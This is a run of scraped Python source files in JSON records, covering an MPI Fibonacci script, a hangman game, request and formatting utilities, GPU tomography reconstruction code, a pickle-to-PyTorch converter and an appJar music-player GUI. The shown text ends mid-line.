\n\n\"\"\"\n\nimport sys\nimport time\nimport fibomod as fb\nfrom mpi4py import MPI\nimport numpy as np\n\nnum_args = len(sys.argv)\nargs = sys.argv\nnum_cpu = 4\n\ndef check_valid(inlist):\n\tis_valid = 1\n\tfor i in range(1,len(inlist)):\n\t\tif(int(inlist[i])<1):\n\t\t\tis_valid = 0\n\treturn is_valid\n\n# Make sure there were 2 arguments to the program\nif(num_args == 2):\n\n\tis_valid = check_valid(args) \n\t# For all the inputs, sequentially compute the requested Fibonacci number\n\tif(is_valid):\n\n\t\tcomm = MPI.COMM_WORLD\n\t\tsize = comm.Get_size()\n\t\trank = comm.Get_rank()\n\n\t\tnumDataPerRank = 1\n\t\tdata = None\n\n\t\tfibo_list = np.arange(int(args[1])) + 1\n\t\tnum_batches = int(len(fibo_list)/num_cpu)\n\n\t\tif rank==0:\t\t\n\t\t\tprint(\"...valid inputs...\")\n\t\t\tprint(\"...number of batches: \" + str(num_batches))\n\n\t\tfor i in range(num_batches):\n\n\t\t\tif rank==0:\n\t\t\t\tt0 = time.time()\n\t\t\t\tdata = np.array(fibo_list[(i*num_cpu):((i+1)*num_cpu)],dtype='d')\n\t\t\t\tprint(\"...batch: \", i + 1);\n\n\t\t\trecvbuf_nodes = np.empty(numDataPerRank,dtype='d')\n\t\t\tcomm.Scatter(data,recvbuf_nodes, root=0)\n\t\t\trecvbuf_nodes = np.array(float(fb.calc_fibo(int(recvbuf_nodes)))) # for each input, compute the output\n\n\t\t\trecvbuf_root = np.empty(4,dtype='d')\n\t\t\tcomm.Gather(recvbuf_nodes,recvbuf_root, root=0) \t\n\n\t\t\tif rank==0:\n\t\t\t\tfor i in range(4):\n\t\t\t\t\toutStr = \"The \" + str(int(data[i])) + \"-th Fibonacci number is: \" + str(int(recvbuf_root[i]))\n\t\t\t\t\tprint(outStr)\n\t\t\n\t\t\t\tt1 = time.time()\n\t\t\t\twt = t1-t0 \n\t\t\t\ttimeStr = \"Wall time = \" + str(\"{:.4}\".format(wt)) + \" seconds\"\n\t\t\t\tprint(timeStr)\n\t\t\t\t\n\t\n\telse:\n\t\tprint(\"...ERROR! Usage: fibompibatch , integer > 0\")\t\nelse:\n\tprint(\"...ERROR! Usage: fibompibatch , integer > 0\")\n\n\t\n\n","repo_name":"cdimattina/MPI_Python","sub_path":"FIBNUM/fibompibatch.py","file_name":"fibompibatch.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14900532636","text":"def hangman(word):\r\n wrong = 0\r\n stages = [\"\",\r\n \"________ \",\r\n \"| | \",\r\n \"| | \",\r\n \"| 0 \",\r\n \"| /|\\ \",\r\n \"| / \\ \",\r\n \"| \",\r\n ]\r\n rletters = list(word)\r\n board = [\"_\"]*len(word)\r\n win = False\r\n print(\"Welcom to the penalty!\")\r\n while wrong < len(stages) - 1:\r\n print(\"\\n\")\r\n msg = \"Enter a letter: \"\r\n guess = input(msg)\r\n if guess in rletters:\r\n cind = rletters.index(guess)\r\n board[cind] = guess\r\n rletters[cind] = \"$\"\r\n else:\r\n wrong += 1\r\n print((\" \".join(board)))\r\n e = wrong + 1\r\n print(\"\\n\".join(stages[0: e]))\r\n if \"_\" not in board:\r\n print(\"You have won! It was made the word: \")\r\n print(\" \".join(board))\r\n win = True\r\n break\r\n if not win:\r\n #print(\"\\n\".join(stages[0: e]))\r\n print(\"You lose! It is made a word: {}.\".format(word))\r\n\r\nhangman(\"cat\")\r\n","repo_name":"SergeiPetroff/hangman","sub_path":"Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29164983849","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport urllib3\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nreplace_map = {'_': '\\\\_',\n '*': '\\\\*',\n '[': '\\\\[',\n ']': '\\\\]',\n '(': '\\\\(',\n ')': '\\\\)',\n '~': '\\\\~',\n '`': '\\\\`',\n '>': '\\\\>',\n '#': '\\\\#',\n '+': '\\\\+',\n '-': '\\\\-',\n '=': '\\\\=',\n '|': '\\\\|',\n '{': '\\\\{',\n '}': '\\\\}',\n '.': '\\\\.',\n '!': '\\\\!'\n }\n\n\ndef create_session(connections=20, retries=5, backoff_factor=2,\n status_forcelist=None, disable_warnings=False) -> requests.Session:\n _session = requests.Session()\n if disable_warnings is True:\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n urllib3.disable_warnings()\n status_forcelist = status_forcelist or (429, 500, 502, 503, 504)\n retry = Retry(total=retries, backoff_factor=backoff_factor, status_forcelist=status_forcelist)\n adapters = HTTPAdapter(pool_connections=connections, max_retries=retry)\n _session.mount('https://', adapters)\n return _session\n\n\ndef replace(string: str) -> str:\n \"\"\"\n Replace parts of a string based on a dictionary.\n\n This function takes a string a dictionary of\n replacement mappings. For example, if I supplied\n the string \"Hello world.\", and the mappings\n {\"H\": \"J\", \".\": \"!\"}, it would return \"Jello world!\".\n\n ref: https://core.telegram.org/bots/api#formatting-options\n\n :param string: string to replace characters in.\n \"\"\"\n for character, replacement in replace_map.items():\n string = string.replace(character, replacement)\n return string\n\n\ndef string_to_int(string: str) -> int:\n def is_digit(string: str) -> bool:\n string = string.replace('.', '', 1)\n return string.isdigit()\n\n def remove_dot(string) -> str:\n return string.replace('.', '', 1)\n\n string = string.strip().lower().replace(',', '')\n try:\n result = int(float(string))\n except ValueError:\n if string.endswith('k') and is_digit(string[:-1]):\n result = int(float(string[:-1]) * 1000)\n elif string.endswith('m') and is_digit(string[:-1]):\n result = int(float(string[:-1]) * 1000000)\n elif string.endswith('b') and is_digit(string[:-1]):\n result = int(float(string[:-1]) * 1000000000)\n else:\n result = 0\n\n return result\n\n\nsession = create_session()\n","repo_name":"stunnel/stacker-news-top","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8940191885","text":"def smallorlarge():\n list = []\n while True:\n try:\n number = input(\"Enter a number:\")\n if number == 'done':\n break\n converted = int(number)\n list.append(converted)\n maximum = max(list)\n minimum = min(list)\n except:\n print(\"input is not a valid number\")\n \n print(\"Maximum is\",maximum)\n print(\"Minimum is\",minimum)\n\nsmallorlarge()","repo_name":"paulde1/py4e","sub_path":"class1/largeorsmall.py","file_name":"largeorsmall.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18261822131","text":"import tomopy\nimport argparse\nimport numpy as np\nimport afnumpy as afnp\nimport arrayfire as af\nfrom gnufft import tvd_update,add_hessian\n\nfrom XT_ForwardModel import forward_project, init_nufft_params, back_project\n\ndef gpuGridrec(tomo,angles,center,input_params):\n \"\"\"\n Gridrec reconstruction using GPU based gridding\n Inputs: tomo : 3D numpy sinogram array with dimensions same as tomopy\n angles : Array of angles in radians\n center : Floating point center of rotation\n input_params : A dictionary with the keys\n 'gpu_device' : Device id of the gpu (For a 4 GPU cluster ; 0-3)\n 'oversamp_factor': A factor by which to pad the image/data for FFT\n 'fbp_filter_param' : A number between 0-1 for setting the filter cut-off for FBP\n \"\"\"\n\n print('Starting GPU NUFFT recon')\n #allocate space for final answer \n af.set_device(input_params['gpu_device']) #Set the device number for gpu based code\n #Change tomopy format\n new_tomo=np.transpose(tomo,(1,2,0)) #slice, columns, angles\n im_size = new_tomo.shape[1]\n num_slice = new_tomo.shape[0]\n num_angles=new_tomo.shape[2]\n pad_size=np.int16(im_size*input_params['oversamp_factor'])\n# nufft_scaling = (np.pi/pad_size)**2\n #Initialize structures for NUFFT\n sino={}\n geom={}\n sino['Ns'] = pad_size#Sinogram size after padding\n sino['Ns_orig'] = im_size #size of original sinogram\n sino['center'] = center + (sino['Ns']/2 - sino['Ns_orig']/2) #for padded sinogram\n sino['angles'] = angles\n sino['filter'] = input_params['fbp_filter_param'] #Paramter to control strength of FBP filter normalized to [0,1]\n\n #Initialize NUFFT parameters\n nufft_params = init_nufft_params(sino,geom)\n rec_nufft = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n Ax = afnp.zeros((sino['Ns'],num_angles),dtype=afnp.complex64)\n pad_idx = slice(sino['Ns']/2-sino['Ns_orig']/2,sino['Ns']/2+sino['Ns_orig']/2)\n rec_nufft_final=np.zeros((num_slice,sino['Ns_orig'],sino['Ns_orig']),dtype=np.float32)\n \n #Move all data to GPU\n slice_1=slice(0,num_slice,2)\n slice_2=slice(1,num_slice,2)\n gdata=afnp.array(new_tomo[slice_1]+1j*new_tomo[slice_2],dtype=afnp.complex64)\n x_recon = afnp.zeros((sino['Ns'],sino['Ns']),dtype=afnp.complex64)\n #loop over all slices\n for i in range(0,num_slice/2):\n Ax[pad_idx,:]=gdata[i]\n #filtered back-projection \n rec_nufft[i] = (back_project(Ax,nufft_params))[pad_idx,pad_idx]\n\n\n #Move to CPU\n #Rescale result to match tomopy\n rec_nufft=np.array(rec_nufft,dtype=np.complex64) #*nufft_scaling\n rec_nufft_final[slice_1]=np.array(rec_nufft.real,dtype=np.float32)\n rec_nufft_final[slice_2]=np.array(rec_nufft.imag,dtype=np.float32)\n return rec_nufft_final\n\n\ndef gpuSIRT(tomo,angles,center,input_params):\n \"\"\"\n SIRT reconstruction using GPU based gridding operators\n Inputs: tomo : 3D numpy sinogram array with dimensions same as tomopy\n angles : Array of angles in radians\n center : Floating point center of rotation\n input_params : A dictionary with the keys\n 'gpu_device' : Device id of the gpu (For a 4 GPU cluster ; 0-3)\n 'oversamp_factor': A factor by which to pad the image/data for FFT\n 'num_iter' : Number of SIRT iterations\n \"\"\"\n print('Starting GPU SIRT recon')\n #allocate space for final answer \n af.set_device(input_params['gpu_device']) #Set the device number for gpu based code\n #Change tomopy format\n new_tomo=np.transpose(tomo,(1,2,0)) #slice, columns, angles\n im_size = new_tomo.shape[1]\n num_slice = new_tomo.shape[0]\n num_angles=new_tomo.shape[2]\n pad_size=np.int16(im_size*input_params['oversamp_factor'])\n# nufft_scaling = (np.pi/pad_size)**2\n num_iter = input_params['num_iter']\n #Initialize structures for NUFFT\n sino={}\n geom={}\n sino['Ns'] = pad_size#Sinogram size after padding\n sino['Ns_orig'] = im_size #size of original sinogram\n sino['center'] = center + (sino['Ns']/2 - sino['Ns_orig']/2) #for padded sinogram\n sino['angles'] = angles\n \n #Initialize NUFFT parameters\n nufft_params = init_nufft_params(sino,geom)\n temp_y = afnp.zeros((sino['Ns'],num_angles),dtype=afnp.complex64)\n temp_x = afnp.zeros((sino['Ns'],sino['Ns']),dtype=afnp.complex64)\n x_recon = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64) \n pad_idx = slice(sino['Ns']/2-sino['Ns_orig']/2,sino['Ns']/2+sino['Ns_orig']/2)\n\n #allocate output array\n rec_sirt_final=np.zeros((num_slice,sino['Ns_orig'],sino['Ns_orig']),dtype=np.float32)\n\n #Pre-compute diagonal scaling matrices ; one the same size as the image and the other the same as data\n #initialize an image of all ones\n x_ones= afnp.ones((sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n temp_x[pad_idx,pad_idx]=x_ones\n temp_proj=forward_project(temp_x,nufft_params) #*(sino['Ns']*afnp.pi/2)\n R = 1/afnp.abs(temp_proj)\n R[afnp.isnan(R)]=0\n R[afnp.isinf(R)]=0\n R=afnp.array(R,dtype=afnp.complex64)\n \n #Initialize a sinogram of all ones\n y_ones=afnp.ones((sino['Ns_orig'],num_angles),dtype=afnp.complex64)\n temp_y[pad_idx]=y_ones\n temp_backproj=back_project(temp_y,nufft_params) #*nufft_scaling/2\n C = 1/(afnp.abs(temp_backproj))\n C[afnp.isnan(C)]=0\n C[afnp.isinf(C)]=0\n C=afnp.array(C,dtype=afnp.complex64)\n \n #Move all data to GPU\n slice_1=slice(0,num_slice,2)\n slice_2=slice(1,num_slice,2)\n gdata=afnp.array(new_tomo[slice_1]+1j*new_tomo[slice_2],dtype=afnp.complex64)\n \n #loop over all slices\n for i in range(num_slice/2):\n for iter_num in range(num_iter):\n #filtered back-projection\n temp_x[pad_idx,pad_idx]=x_recon[i]\n Ax = forward_project(temp_x,nufft_params)\n temp_y[pad_idx]=gdata[i]\n x_recon[i] = x_recon[i]+(C*back_project(R*(temp_y-Ax),nufft_params))[pad_idx,pad_idx] #nufft_scaling\n\n #Move to CPU\n #Rescale result to match tomopy\n rec_sirt=np.array(x_recon,dtype=np.complex64)\n rec_sirt_final[slice_1]=np.array(rec_sirt.real,dtype=np.float32)\n rec_sirt_final[slice_2]=np.array(rec_sirt.imag,dtype=np.float32)\n return rec_sirt_final\n\n\ndef gpuMBIR(tomo,angles,center,input_params):\n \"\"\"\n MBIR reconstruction using GPU based gridding operators\n Inputs: tomo : 3D numpy sinogram array with dimensions same as tomopy\n angles : Array of angles in radians\n center : Floating point center of rotation\n input_params : A dictionary with the keys\n 'gpu_device' : Device id of the gpu (For a 4 GPU cluster ; 0-3)\n 'oversamp_factor': A factor by which to pad the image/data for FFT\n 'num_iter' : Max number of MBIR iterations\n 'smoothness' : Regularization constant\n 'p': MRF shape param\n \"\"\"\n print('Starting GPU MBIR recon')\n #allocate space for final answer \n af.set_device(input_params['gpu_device']) #Set the device number for gpu based code\n #Change tomopy format\n new_tomo=np.transpose(tomo,(1,2,0)) #slice, columns, angles\n im_size = new_tomo.shape[1]\n num_slice = new_tomo.shape[0]\n num_angles=new_tomo.shape[2]\n pad_size=np.int16(im_size*input_params['oversamp_factor'])\n# nufft_scaling = (np.pi/pad_size)**2\n num_iter = input_params['num_iter']\n mrf_sigma = input_params['smoothness']\n mrf_p = input_params['p']\n print('MRF params p=%f sigma=%f' %(mrf_p,mrf_sigma))\n #Initialize structures for NUFFT\n sino={}\n geom={}\n sino['Ns'] = pad_size#Sinogram size after padding\n sino['Ns_orig'] = im_size #size of original sinogram\n sino['center'] = center + (sino['Ns']/2 - sino['Ns_orig']/2) #for padded sinogram\n sino['angles'] = angles\n \n #Initialize NUFFT parameters\n print('Initialize NUFFT params')\n nufft_params = init_nufft_params(sino,geom)\n\n temp_y = afnp.zeros((sino['Ns'],num_angles),dtype=afnp.complex64)\n temp_x = afnp.zeros((sino['Ns'],sino['Ns']),dtype=afnp.complex64)\n x_recon = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n \n pad_idx = slice(sino['Ns']/2-sino['Ns_orig']/2,sino['Ns']/2+sino['Ns_orig']/2)\n\n #allocate output array\n rec_mbir_final=np.zeros((num_slice,sino['Ns_orig'],sino['Ns_orig']),dtype=np.float32)\n \n #Move all data to GPU\n print('Moving data to GPU')\n slice_1=slice(0,num_slice,2)\n slice_2=slice(1,num_slice,2)\n gdata=afnp.array(new_tomo[slice_1]+1j*new_tomo[slice_2],dtype=afnp.complex64)\n gradient = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']), dtype=afnp.complex64)#temp array to store the derivative of cost func\n z_recon = afnp.zeros((num_slice/2,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)#Nesterov method variables\n t_nes = 1\n \n #Compute Lipschitz of gradient\n print('Computing Lipschitz of gradient')\n x_ones= afnp.ones((1,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n temp_x[pad_idx,pad_idx]=x_ones[0]\n temp_proj=forward_project(temp_x,nufft_params)\n temp_backproj=(back_project(temp_proj,nufft_params))[pad_idx,pad_idx]\n print('Adding Hessian of regularizer')\n temp_backproj2=afnp.zeros((1,sino['Ns_orig'],sino['Ns_orig']),dtype=afnp.complex64)\n temp_backproj2[0]=temp_backproj\n add_hessian(mrf_sigma,x_ones, temp_backproj2)\n L = np.max([temp_backproj2.real.max(),temp_backproj2.imag.max()])\n print('Lipschitz constant = %f' %(L))\n del x_ones,temp_proj,temp_backproj,temp_backproj2\n\n #loop over all slices\n for iter_num in range(num_iter):\n print('Iteration %d of %d'%(iter_num,num_iter))\n #Derivative of the data fitting term\n for i in range(num_slice/2):\n temp_x[pad_idx,pad_idx]=x_recon[i]\n Ax = forward_project(temp_x,nufft_params)\n temp_y[pad_idx]=gdata[i]\n gradient[i] =(back_project((Ax-temp_y),nufft_params))[pad_idx,pad_idx] #nufft_scaling\n #Derivative of regularization term\n tvd_update(mrf_p,mrf_sigma,x_recon, gradient) \n #x_recon-=gradient/L\n x_recon,z_recon,t_nes=nesterovOGM2update(x_recon,z_recon,t_nes,gradient,L)\n \n #Move to CPU\n #Rescale result to match tomopy\n rec_mbir=np.array(x_recon,dtype=np.complex64)\n rec_mbir_final[slice_1]=np.array(rec_mbir.real,dtype=np.float32)\n rec_mbir_final[slice_2]=np.array(rec_mbir.imag,dtype=np.float32)\n return rec_mbir_final\n\ndef nesterovOGM1update(x,z,t,grad,L):\n#L = Lipshcitz constant\n tNew = 0.5*(1+np.sqrt(1+4*(t**2)))\n zNew = x - grad/L\n xNew = zNew + ((t-1)/tNew)*(zNew-z)\n return xNew,zNew,tNew\n\ndef nesterovOGM2update(x,z,t,grad,L):\n#L = Lipshcitz constant\n zNew = x - grad/L\n tNew = 0.5*(1+np.sqrt(1+4*(t**2)))\n xNew =zNew + ((t -1)/tNew)*(zNew-z) + (t/tNew)*(zNew-x)\n return xNew,zNew,tNew\n \n","repo_name":"ronpandolfi/Xi-cam","sub_path":"xicam/plugins/tomography/tomocam/tomoCam.py","file_name":"tomoCam.py","file_ext":"py","file_size_in_byte":11633,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"8891347013","text":"import pickle\nimport torch\nfrom StyleGANDiscriminator import Discriminator_pt as D\n\ndef parse_args():\n parser = argparase.ArgumentParser()\n parser.add_argument('pkl_params_path', type=str, help='Path to the pkl-param.')\n parser.add_argument('output_model_name', type=str, help='Name of the params of pytorch-model.')\n return parser.parse_args()\n\ndef main():\n args = parse_args()\n discriminator = D(0, 256, 3)\n\n with open(args.pkl, 'rb') as f:\n d_params = pickle.load(f)\n print(\"Loading completed.\")\n\n param_name = []\n for key in d_params.keys():\n param_name.append(key)\n param_name = param_name[1:]\n\n torch_param = discriminator.state_dict()\n param_name_pt = []\n for key in torch_param.keys():\n if 'resample' not in key:\n param_name_pt.append(key)\n\n print('Extraction of names of params completed.')\n\n for i in range(len(param_name)):\n param = d_param[param_name[i]]\n torch_param[param_name_pt[i]].data = torch.tensor(param)\n\n discriminator.load_state_dict(torch_param)\n\n torch.save(discriminator.state_dict(), args.output_model_name)\n print('Saved completely.')\n\nif __name__ == '__main__':\n main()\n","repo_name":"watarumacaron/pkl2pt","sub_path":"convert_param.py","file_name":"convert_param.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27017823163","text":"import os\nimport ntpath\nimport sys\nimport threading\nimport time\nfrom appJar import gui\nimport DBhandling as db\nimport mediaHandling as media\nimport playlistLogic as pl\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\napp = gui('main menu', '600x500', showIcon=True)\nmedia.initialize()\n# media.queuePlaylist(db.getPlaylist('test'))# testing\n\n\napp.setIcon(os.path.join(script_dir, 'icon.ico'))\napp.setIcon('icon.ico')\n\ndef stopFunction():\n # stop the infinite loop in media\n media.stopLoop()\n return True\n\napp.setStopFunction(stopFunction)\n\ndef temporaryWindow(title, body):\n '''\n produces and opens destructible subwindow.\n - title is the title of the subwindow\n - body is a function where the contents of the window are specified (adding\n buttons, etc.)\n '''\n global isDestroying\n # prevents stopFunction - destroySubWindow infinite recursion\n isDestroying = False\n def destroy():\n global isDestroying\n if not isDestroying:\n isDestroying = True\n app.destroySubWindow(title)\n isDestroying = False\n return True\n app.startSubWindow(title, modal=True, transient=True)\n app.setStopFunction(destroy)\n body()\n app.stopSubWindow()\n app.showSubWindow(title)\n\n\ndef addSong():\n path = app.openBox('select a song to add', fileTypes=[('Audio', '*.mp3')])\n if path:\n name = ntpath.basename(path)\n app.infoBox('test', path+'\\n'+name)\n bangericity = 0.0\n while True:\n bangericity = app.floatBox('bangericity input', 'enter a\\\n bangericity from 0 to 100')\n if bangericity is None:\n # user cancelled\n break\n # validate bangericity\n if 0 <= bangericity and bangericity <= 100:\n break\n app.errorBox('invalid bangericity box', 'Error: bangericity must be\\\n between 0 and 100')\n if bangericity is not None:\n try:\n db.addSong(path, name, bangericity)\n except FileExistsError:\n app.errorBox('duplicate song error box',\n 'Error: A song with this name already exists. The song will\\\n not be added.')\n updateSongTable()\n\n\nrealSlide = True\ndef seek(slider):\n '''slider callback'''\n global realSlide\n if slider == 'slider' and realSlide:\n value = app.getScale('slider') / 100\n duration = media.getDuration()\n if duration is not None:\n time = media.getDuration() * value\n media.seek(time)\n media.play()\n\ndef updateSlider():\n '''sets slider according to song progress'''\n global realSlide\n time = media.getTime()\n if time is not None:\n duration = media.getDuration()\n ratio = time / duration\n realSlide = False\n app.setScale('slider', ratio*100)\n realSlide = True\n\ndef songAction(rowNum):\n songOptionsWindow(app.getTableRow('song table', rowNum)[0])\n\ndef songOptionsWindow(song):\n song = db.getSong(song)\n title = song.name+' options'\n def optionsContent():\n def press(button):\n if button == 'play now':\n media.forcePlay(song)\n elif button == 'add to queue':\n media.queue(song)\n elif button == 'edit tags':\n # new window for editing tags\n def body1():\n allTags = db.getAllTags()\n songTags = song.tags\n boolDict = {}\n for tag in allTags:\n if tag in songTags:\n boolDict[tag.name] = True\n else:\n boolDict[tag.name] = False\n app.properties('song tag selection', value=boolDict)\n def editTagPress(button):\n if button == 'submit':\n result = app.getProperties('song tag selection')\n newTags = []\n for tag in result:\n if result[tag] is True:\n newTags.append(db.getTag(tag))\n db.setSongTags(song, newTags)\n app.destroySubWindow('edit tags window')\n app.addButton('submit', editTagPress)\n temporaryWindow('edit tags window', body1)\n elif button == 'change bangericity':\n bangericity = 0.0\n while True:\n bangericity = app.floatBox('bangericity input', 'enter a\\\n bangericity from 0 to 100')\n if bangericity is None:\n # user cancelled\n break\n # validate bangericity\n if 0 <= bangericity and bangericity <= 100:\n break\n app.errorBox('invalid bangericity box', 'Error: bangericity\\\n must be between 0 and 100')\n if bangericity is not None:\n db.changeBangericity(song, bangericity)\n updateSongTable()\n elif button == 'remove from library':\n confirmation = app.yesNoBox('remove song?', 'Are you sure you\\\n want to remove this song?')\n if confirmation is True:\n db.removeSong(song)\n updateSongTable()\n app.destroySubWindow(title)\n\n app.addButtons(['play now', 'add to queue', 'edit tags',\n 'change bangericity', 'remove from library'], press\n )\n temporaryWindow(title, optionsContent)\n\ndef playlistForm(playlist=None):\n '''can be used for creation and editing.\n if playlist is None, it goes to creation mode\n '''\n if playlist == 'newRow':\n playlist = None\n title = ''\n if playlist is not None:\n playlist = db.getPlaylist(playlist)\n title = 'edit playlist '+playlist.name\n else:\n title = 'create playlist'\n\n def formContents():\n allTags = db.getAllTags()\n includedTags = []\n excludedTags = []\n if playlist is not None:\n includedTags = playlist.includedTags\n excludedTags = playlist.excludedTags\n includedTagDict = {}\n excludedTagDict = {}\n # both going to be {tagname => boolean, ...}\n for tag in allTags:\n includedTagDict[tag.name] = tag in includedTags\n excludedTagDict[tag.name] = tag in excludedTags\n if playlist is None:\n app.addLabel('playlist name:')\n app.entry('name')\n\n app.properties('included tags', includedTagDict)\n app.properties('excluded tags', excludedTagDict)\n app.addLabel('minimum and maximum bangericity:')\n app.addNumericEntry('minimum bangericity')\n app.addNumericEntry('maximum bangericity')\n min = 0\n max = 100\n if playlist is not None:\n min = playlist.minBangericity\n max = playlist.maxBangericity\n app.setEntry('minimum bangericity', min)\n app.setEntry('maximum bangericity', max)\n\n app.addCheckBox('use AND logic on includes')\n ticked = True\n if playlist is not None:\n ticked = playlist.andLogic\n app.setCheckBox('use AND logic on includes', ticked=ticked)\n\n\n def submit(button):\n if button == 'submit':\n # bangericity\n minBangericity = float(app.getEntry('minimum bangericity'))\n maxBangericity = float(app.getEntry('maximum bangericity'))\n # validate bangericities\n if not minBangericity < maxBangericity:\n app.errorBox('invalid bangericities', 'minimum bangericity\\\n must be less than maximum bangericity')\n return None\n # include logic\n andLogic = app.getCheckBox('use AND logic on includes')\n # tags\n newIncludedTags = []\n newExcludedTags = []\n includedTagDict = app.getProperties('included tags')\n excludedTagDict = app.getProperties('excluded tags')\n ##### left off here investigating bug where you can't edit then add\n # also label entries\n # figure out what the new tags will be\n for tag in includedTagDict:\n if includedTagDict[tag] is True:\n newIncludedTags.append(db.getTag(tag))\n if excludedTagDict[tag] is True:\n newExcludedTags.append(db.getTag(tag))\n # name\n if playlist is None:\n name = app.getEntry('name')\n # validate name\n if name == '':\n app.errorBox('invalid name', 'playlist must have a name')\n return None\n existingPlaylistNames = [\n playlist.name for playlist in db.getAllPlaylists()\n ]\n if name in existingPlaylistNames:\n app.errorBox('duplicate name', 'a playlist with that\\\n name already exists')\n return None\n # create playlist\n db.addPlaylist(name, newIncludedTags, newExcludedTags,\n minBangericity, maxBangericity, andLogic\n )\n showPlaylistSongs(name)\n updatePlaylistTable()\n app.destroySubWindow(title)\n else:\n # edit playlist\n playlist.includedTags = newIncludedTags\n playlist.excludedTags = newExcludedTags\n playlist.minBangericity = minBangericity\n playlist.maxBangericity = maxBangericity\n playlist.andLogic = andLogic\n showPlaylistSongs(playlist)\n updatePlaylistTable()\n app.destroySubWindow(title)\n\n app.addButton('submit', submit)\n\n temporaryWindow(title, formContents)\ndef showPlaylistSongs(playlist):\n playlist = db.getPlaylist(playlist)\n songs = list(pl.buildPlaylist(playlist))\n songNames = [song.name for song in songs]\n app.infoBox(playlist.name+' songs', '\\n'.join(songNames))\ndef playlistAction(rowNum):\n playlistOptionsWindow(app.getTableRow('playlist table', rowNum)[0])\n\ndef playlistOptionsWindow(playlist):\n playlist = db.getPlaylist(playlist)\n title = playlist.name+' playlist options window'\n\n def optionsContent():\n def press(button):\n if button == 'play now':\n media.forcePlayPlaylist(playlist)\n elif button == 'add to queue':\n media.queuePlaylist(playlist)\n elif button == 'view songs':\n showPlaylistSongs(playlist)\n elif button == 'edit':\n playlistForm(playlist)\n # remember to edit bangericity and includeLogic too\n elif button == 'remove':\n confirmation = app.yesNoBox('remove playlist?',\n 'Are you sure you want to remove this playlist?')\n if confirmation is True:\n db.removePlaylist(playlist)\n updatePlaylistTable()\n app.destroySubWindow(title)\n app.addButtons(['play now', 'add to queue', 'view songs', 'edit', 'remove'],\n press)\n # maybe don't do make into a tag\n temporaryWindow(title, optionsContent)\n\ndef tagAction(rowNum):\n tagOptionsWindow(app.getTableRow('tag table', rowNum)[0])\n\ndef tagOptionsWindow(tag):\n tag = db.getTag(tag)\n title = tag.name + ' tag options window'\n def press(button):\n if button == 'view songs':\n songs = tag.songs\n songNames = [song.name for song in songs]\n app.infoBox('songs', '\\n'.join(songNames))\n elif button == 'remove':\n if app.yesNoBox('confirmation', 'are you sure you want to remove this tag?'):\n db.removeTag(tag)\n updateTagTable()\n app.destroySubWindow(title)\n def optionsContent():\n app.addButtons(['view songs', 'remove'], press)\n temporaryWindow(title, optionsContent)\n\ndef loop():\n global updateSlider\n while threading.main_thread().is_alive():\n updateSlider()\n updateSongLabel()\n time.sleep(1)\n\ndef addTag():\n name = app.stringBox('create a tag', 'tag name:')\n db.addTag(name)\n updateTagTable()\n\nwith app.tabbedFrame('tabs'):\n with app.tab('songs'):\n songs = db.getAllSongs()\n tableArr = [[song.name, song.bangericity] for song in songs]\n tableArr.sort()\n app.addTable('song table', [['Name','Bangericity']]+tableArr, colspan=3, addRow=addSong, showMenu=True, action=songAction)\n with app.tab('playlists'):\n playlists = db.getAllPlaylists()\n tableArr = [[playlist.name] for playlist in playlists]\n tableArr.sort()\n app.addTable('playlist table', [['Name']]+tableArr, colspan=3, showMenu=True, action=playlistAction, addRow=playlistForm)\n with app.tab('tags'):\n tags = db.getAllTags()\n tableArr = [[tag.name] for tag in tags]\n tableArr.sort()\n app.addTable('tag table', [['Name']]+tableArr, colspan=3, showMenu=True, action=tagAction, addRow=addTag)\n\ndef updateSongTable():\n songs = db.getAllSongs()\n tableArr = [[song.name, song.bangericity] for song in songs]\n tableArr.sort()\n app.replaceAllTableRows('song table', tableArr)\n\ndef updatePlaylistTable():\n playlists = db.getAllPlaylists()\n tableArr = [[playlist.name] for playlist in playlists]\n tableArr.sort()\n app.replaceAllTableRows('playlist table', tableArr)\n\ndef updateTagTable():\n tags = db.getAllTags()\n tableArr = [[tag.name] for tag in tags]\n tableArr.sort()\n app.replaceAllTableRows('tag table', tableArr)\n\n\ndef mediaPress(button):\n if button == 'previous':\n media.previousSong()\n elif button == 'pause':\n media.pause()\n elif button == 'play':\n media.play()\n elif button == 'next':\n media.nextSong()\n\n\ndef updateSongLabel():\n if media.getPlaying():\n app.setLabel('currently playing label', media.getPlaying().name)\n\n\nwith app.frame('bottom', row=3):\n app.addLabel('currently playing label', '')\n app.addScale('slider')\n app.setScaleIncrement('slider', 0)\n t = threading.Thread(target=loop)\n t.start()\n app.setScaleChangeFunction('slider', seek)\n app.addButtons(['previous', 'pause', 'play', 'next'], mediaPress)\n app.setButtonImage('play', os.path.join(app.icon_path, 'md-play.png'))\n app.setButtonImage('pause', os.path.join(app.icon_path, 'md-pause.png'))\n app.setButtonImage('next', os.path.join(app.icon_path, 'md-next.png'))\n app.setButtonImage('previous', os.path.join(app.icon_path, 